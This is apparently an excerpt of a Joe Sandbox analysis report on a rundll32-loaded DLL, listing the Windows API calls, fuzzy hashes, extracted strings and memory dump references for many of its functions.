                                                                                                                                                            • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                                            • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Focus$Window$MessageParentState$BeepDialogEnabledH_prolog3_catch
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 656273425-0
                                                                                                                                                            • Opcode ID: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                                            • Instruction ID: ae1ce06b8cbd239f24ee816c06620fe7a5750cbf7a5142a39db81a57ec361da3
                                                                                                                                                            • Opcode Fuzzy Hash: c00fbb9f62a63b0a8ab12a0078c89d294cc621361981fd48dcea0cc4144d3722
                                                                                                                                                            • Instruction Fuzzy Hash: ECF1BC35E00206ABDF11EF61E984AAE7BF5EF46790F924029E845AB161DF34ECC0DB51
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001DDC0: GetWindowLongA.USER32(?,000000F0), ref: 1001DDCB
                                                                                                                                                            • GetParent.USER32(?), ref: 1001AA75
                                                                                                                                                            • SendMessageA.USER32 ref: 1001AA98
                                                                                                                                                            • GetWindowRect.USER32 ref: 1001AAB2
                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 1001AAC8
                                                                                                                                                            • CopyRect.USER32(?,?), ref: 1001AB15
                                                                                                                                                            • CopyRect.USER32(?,?), ref: 1001AB1F
                                                                                                                                                            • GetWindowRect.USER32 ref: 1001AB28
                                                                                                                                                            • CopyRect.USER32(?,?), ref: 1001AB44
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                                            • String ID: (
                                                                                                                                                            • API String ID: 808654186-3887548279
                                                                                                                                                            • Opcode ID: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                                            • Instruction ID: b5709b81a08ee2b414ac32db9db5e9a4175f57b01f1fa3e32d23aafb2ee176ce
                                                                                                                                                            • Opcode Fuzzy Hash: 058a394f33d0b4ea0f3338ceab01116baeabbc1ca71f5aa138c65239db7cf94a
                                                                                                                                                            • Instruction Fuzzy Hash: CC513C72900219AFDB00CBA8CD85EEEBBF9EF49214F154115F905EB291EB34E985CB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • _memset.LIBCMT ref: 100161DE
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 100161FC
                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 10016206
                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 10016248
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016253
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 1001625C
                                                                                                                                                            • SuspendThread.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 10016267
                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,00000000), ref: 10016277
                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 10016280
                                                                                                                                                            • CloseHandle.KERNEL32(00000002), ref: 100162A2
                                                                                                                                                              • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                                                            • SetEvent.KERNEL32(00000004,?,?,?,?,?,?,?,00000000), ref: 1001628A
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseEventHandle$CreateObjectSingleThreadWait$Exception@8ResumeSuspendThrow_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3191170017-0
                                                                                                                                                            • Opcode ID: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                                            • Instruction ID: 00337a1eacd8e53df2662d8cc6bc483a2e3f323796300d703392e3233c80558b
                                                                                                                                                            • Opcode Fuzzy Hash: 2f30da852c83b448af5579f0f44270d029fe44d128d829d4e1193c6c18408e94
                                                                                                                                                            • Instruction Fuzzy Hash: 69314772800A19FFDF11AFA4CD849AEBBB8EB08394F108269F511A6160D671A9818F61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32,00000000,?,00000020,1001501F,000000FF), ref: 1001455A
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateActCtxA,10000000), ref: 10014578
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10014585
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10014592
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 1001459F
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                            • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                                            • API String ID: 667068680-3617302793
                                                                                                                                                            • Opcode ID: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                                            • Instruction ID: 377a8d7a9955057825aa4721d5912d38cb8da7d44d97b701af19917326088f09
                                                                                                                                                            • Opcode Fuzzy Hash: 70c6ef07d46d29c871f349003da5afecfc7d385a2253c1c7baa95387be190aff
                                                                                                                                                            • Instruction Fuzzy Hash: E711A0B1902766FFE710DF658CD040B7BE5E780256313023FF108CA422DA729884CB22
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10017375
                                                                                                                                                            • FindResourceA.KERNEL32 ref: 100173A8
                                                                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 100173B0
                                                                                                                                                            • LockResource.KERNEL32(00000008,00000024,100010EC,00000000,10046640), ref: 100173C1
                                                                                                                                                            • GetDesktopWindow.USER32 ref: 100173F4
                                                                                                                                                            • IsWindowEnabled.USER32(000000FF), ref: 10017402
                                                                                                                                                            • EnableWindow.USER32(000000FF,00000000), ref: 10017411
                                                                                                                                                              • Part of subcall function 1001DEAF: IsWindowEnabled.USER32(?), ref: 1001DEB8
                                                                                                                                                              • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                                                            • EnableWindow.USER32(000000FF,00000001), ref: 100174ED
                                                                                                                                                            • GetActiveWindow.USER32 ref: 100174F8
                                                                                                                                                            • SetActiveWindow.USER32(000000FF), ref: 10017506
                                                                                                                                                            • FreeResource.KERNEL32(00000008,?,00000024,100010EC,00000000,10046640), ref: 10017522
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchLoadLock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1509511306-0
                                                                                                                                                            • Opcode ID: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                                            • Instruction ID: 24f9302adfe4a133b48f7954ad32019338b8f4d830f04ff5f1dc3598c8fc37ea
                                                                                                                                                            • Opcode Fuzzy Hash: 8887fad69eff7dfeb0e1daad3ea1c484619822cd4cc789857992b00dd05f503d
                                                                                                                                                            • Instruction Fuzzy Hash: 41519A34A00715DBDB11EFB4CD896AEBBF2FF48701F204129E506AA1A1DB74E9C1CB55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 1001C7D8
                                                                                                                                                            • GetPropA.USER32(?,AfxOldWndProc423), ref: 1001C7E7
                                                                                                                                                            • CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 1001C841
                                                                                                                                                              • Part of subcall function 1001B617: GetWindowRect.USER32 ref: 1001B63F
                                                                                                                                                              • Part of subcall function 1001B617: GetWindow.USER32(?,00000004), ref: 1001B65C
                                                                                                                                                            • SetWindowLongA.USER32 ref: 1001C868
                                                                                                                                                            • RemovePropA.USER32(?,AfxOldWndProc423), ref: 1001C870
                                                                                                                                                            • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 1001C877
                                                                                                                                                            • GlobalDeleteAtom.KERNEL32(00000000), ref: 1001C87E
                                                                                                                                                              • Part of subcall function 10019DB1: GetWindowRect.USER32 ref: 10019DBD
                                                                                                                                                            • CallWindowProcA.USER32(?,?,?,?,00000000), ref: 1001C8D2
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prolog3_catchLongRemove
                                                                                                                                                            • String ID: AfxOldWndProc423
                                                                                                                                                            • API String ID: 2702501687-1060338832
                                                                                                                                                            • Opcode ID: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                                            • Instruction ID: 2c86e32aa846b6cd4ed02fbbba056fe4065443c08480c9ca6c7694d446bc6c4a
                                                                                                                                                            • Opcode Fuzzy Hash: a063fd3bf8fccbd5a0981dbc34fedfe81f848f8f936f79458706efa0baf70b36
                                                                                                                                                            • Instruction Fuzzy Hash: D931417680011AEBDF06DFA4CD89DFF7AB8EF0A311F004124F611AA061DB79D9919B65
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                                                              • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                                                            • inet_addr.WS2_32(?), ref: 10012ECA
                                                                                                                                                            • htons.WS2_32(00001C1F), ref: 10012EF0
                                                                                                                                                              • Part of subcall function 1001C0D4: GetWindowTextLengthA.USER32 ref: 1001C0E0
                                                                                                                                                              • Part of subcall function 1001C0D4: GetWindowTextA.USER32(?,00000000,00000000), ref: 1001C0F8
                                                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 10012F58
                                                                                                                                                            • _printf.LIBCMT ref: 10012F79
                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 10012F87
                                                                                                                                                            • WSACleanup.WS2_32 ref: 10012FB6
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: TextWindow$CleanupH_prolog3LengthStartup_printfhtonsinet_addrsocket
                                                                                                                                                            • String ID: Please enter your name$WSAStartup function failed with error: %d$error
                                                                                                                                                            • API String ID: 4222005279-2156106531
                                                                                                                                                            • Opcode ID: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                                            • Instruction ID: 3737c0697f466a88bc0bbe9275da51ac62ffde411ffa2b98b4ee14bbe11db7c9
                                                                                                                                                            • Opcode Fuzzy Hash: 67037696b88feaf8089c85546bf0036186714c2ea7473beb98d4f0a5558571d4
                                                                                                                                                            • Instruction Fuzzy Hash: 6A317174A85218DBE724DB90CD66FD9B3B1EF48300F1041E8E609AA2C2DB72E9C18F55
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetModuleHandleA.KERNEL32(KERNEL32.DLL,10050C40,0000000C,100352C7,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2), ref: 100351C6
                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,EncodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351EF
                                                                                                                                                            • GetProcAddress.KERNEL32(?,DecodePointer,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387), ref: 100351FF
                                                                                                                                                            • InterlockedIncrement.KERNEL32(10054D18), ref: 10035221
                                                                                                                                                            • __lock.LIBCMT ref: 10035229
                                                                                                                                                            • ___addlocaleref.LIBCMT ref: 10035248
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                                            • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                                            • API String ID: 1036688887-2843748187
                                                                                                                                                            • Opcode ID: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                                            • Instruction ID: b318c4b35d3b307acbdb6d10fcd30e50ea36946f4a8ba2e6b5da3482df9394b6
                                                                                                                                                            • Opcode Fuzzy Hash: d574a0f1000a19323f7053aa8cd70e6a5049edfe48066084e54d0a0798c8c5f6
                                                                                                                                                            • Instruction Fuzzy Hash: B811ACB0801B01AFE721CF79CC80B9ABBE0EF05302F104529E49ADB261DB75A900CF15
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 10017185
                                                                                                                                                            • GetSystemMetrics.USER32 ref: 10017236
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 1001729F
                                                                                                                                                            • CreateDialogIndirectParamA.USER32(?,?,?,10016BDA,00000000), ref: 100172CE
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDialogGlobalH_prolog3_catchIndirectLockMetricsParamSystem
                                                                                                                                                            • String ID: MS Shell Dlg
                                                                                                                                                            • API String ID: 1736106359-76309092
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GetStockObject.GDI32(00000011), ref: 10021EFD
                                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 10021F05
                                                                                                                                                            • GetObjectA.GDI32(00000000,0000003C,?), ref: 10021F12
                                                                                                                                                            • GetDC.USER32(00000000), ref: 10021F21
                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 10021F35
                                                                                                                                                            • MulDiv.KERNEL32 ref: 10021F41
                                                                                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 10021F4D
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Object$Stock$CapsDeviceRelease
                                                                                                                                                            • String ID: System
                                                                                                                                                            • API String ID: 46613423-3470857405
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3_catch.LIBCMT ref: 100209F4
                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,00000010,10020CA6,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031), ref: 10020A05
                                                                                                                                                            • TlsGetValue.KERNEL32 ref: 10020A23
                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020A57
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020AC3
                                                                                                                                                            • _memset.LIBCMT ref: 10020AE2
                                                                                                                                                            • TlsSetValue.KERNEL32(?,00000000), ref: 10020AF3
                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004,10001031,00000000), ref: 10020B14
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1891723912-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 10025BAC
                                                                                                                                                              • Part of subcall function 1002426A: SysStringLen.OLEAUT32(?), ref: 10024272
                                                                                                                                                              • Part of subcall function 1002426A: CoGetClassObject.OLE32(?,?,00000000,1004B62C,?), ref: 10024290
                                                                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 10025D36
                                                                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 10025D57
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 10025DA4
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10025DB2
                                                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 10025DCA
                                                                                                                                                            • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 10025DED
                                                                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 10025E09
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 317715441-0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10014A3F
                                                                                                                                                            • lstrcmpA.KERNEL32(?,?), ref: 10014A4B
                                                                                                                                                            • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 10014A5D
                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A7D
                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10014A85
                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10014A8F
                                                                                                                                                            • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 10014A9C
                                                                                                                                                            • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 10014AB4
                                                                                                                                                              • Part of subcall function 10020495: GlobalFlags.KERNEL32(?), ref: 100204A0
